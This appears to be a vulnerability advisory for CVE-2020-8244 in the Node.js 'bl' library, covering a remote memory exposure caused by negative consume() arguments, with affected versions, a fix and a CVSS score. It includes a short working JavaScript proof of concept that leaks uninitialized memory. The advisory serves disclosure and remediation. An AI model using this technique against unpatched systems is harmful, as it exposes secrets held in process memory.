Remote Memory Exposure

Affecting bl package, versions >=2.2.0 <2.2.1 || >=3.0.0 <3.0.1 || >=4.0.0 <4.0.3 || <1.2.3

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

bl is a library that allows you to collect buffers and access with a standard readable buffer interface.

Affected versions of this package are vulnerable to Remote Memory Exposure. If user input ends up in consume() argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.

PoC by chalker

const { BufferList } = require('bl')
const secret = require('crypto').randomBytes(256)
for (let i = 0; i < 1e6; i++) {
  const clone = Buffer.from(secret)
  const bl = new BufferList()
  bl.append(Buffer.from('a'))
  bl.consume(-1024)
  const buf = bl.slice(1)
  if (buf.indexOf(clone) !== -1) {
    console.error(`Match (at ${i})`, buf)
  }
}

Remediation

Upgrade bl to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.

References

CVSS Score

7.7
high severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    Low
  • User Interaction
    None
  • Scope
    Changed
  • Confidentiality
    High
  • Integrity
    Low
  • Availability
    Low
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L
Credit
chalker
CVE
CVE-2020-8244
CWE
CWE-9
Snyk ID
SNYK-JS-BL-608877
Disclosed
27 Aug, 2020
Published
28 Aug, 2020